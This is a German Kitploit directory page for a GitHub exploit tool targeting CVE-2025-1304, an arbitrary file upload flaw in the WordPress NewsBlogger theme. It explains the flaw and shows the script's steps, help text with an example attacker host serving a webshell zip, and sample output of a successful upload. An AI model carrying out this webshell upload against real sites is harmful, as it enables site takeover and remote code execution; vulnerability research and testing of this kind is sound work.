Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1304 — Das WordPress-Theme NewsBlogger <= 0.2.5.1 ist anfällig für beliebigen Datei-Upload. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-1304
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-1304

CVE-2025-1304

Das WordPress-Theme NewsBlogger <= 0.2.5.1 ist anfällig für beliebigen Datei-Upload.

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 WordPress NewsBlogger Theme <= 0.2.5.1 - Beliebiger Datei-Upload (CVE-2025-1304)

CVSS-Wert: 8.8 (Hoch)
Schwachstellentyp: Beliebiger Datei-Upload
Komponente: WordPress-Theme
CVE-ID: CVE-2025-1304


🔥 Schwachstellenübersicht

Das WordPress-Theme NewsBlogger (Versionen <= 0.2.5.1) ist über das Admin-Willkommenspanel von einer Schwachstelle vom Typ Beliebiger Datei-Upload betroffen.

Diese Schwachstelle erlaubt es jedem authentifizierten Benutzer – einschließlich solcher mit der minimalen Abonnent-Rolle – ein bösartiges .zip-Archiv hochzuladen, das eine Webshell enthält.
Der Upload erfolgt über ein nicht validiertes Plugin-URL-Feld, das den Inhalt oder Typ der hochgeladenen Datei nicht ordnungsgemäß überprüft.

Ein erfolgreicher Angriff kann zur vollständigen Kompromittierung der Website führen, einschließlich Remotecodeausführung und Privilegieneskalation.


🧠 Skript-Details

Dieses Python-Skript automatisiert die Ausnutzung der Schwachstelle, indem es:

  • sich mit den angegebenen Admin-Anmeldedaten anmeldet.
  • die nonce dynamisch aus der verwundbaren Begrüßungsseite extrahiert.
  • ein entferntes bösartiges Plugin über den verwundbaren AJAX-Endpunkt hochlädt.

  • ⚙️ Verwendung

    root@kitploit:~
    python CVE-2025-1304.py -h
    
    root@kitploit:~
    usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
    
    WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
    
    options:
      -h, --help                show this help message and exit
      --url, -u URL             Target base URL (e.g., http://target/wordpress)
      --username, -un USERNAME WordPress admin username
      --password, -p PASSWORD   WordPress admin password
      --shellweb, -shell SHELLWEB
                               Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
    

    📤 Beispielausgabe

    root@kitploit:~
    [+] Logging in to http://target/wordpress/wp-login.php
    [+] Logged in successfully.
    [+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
    [+] Extracted nonce: 012818100b
    [+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
    [+] Server response:
    {"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
    

    ⚠️ Haftungsausschluss

    Dieser Code wird ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke bereitgestellt.
    Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.


    By: Nxploited ( Khaled Alenazi )

    Tool herunterladen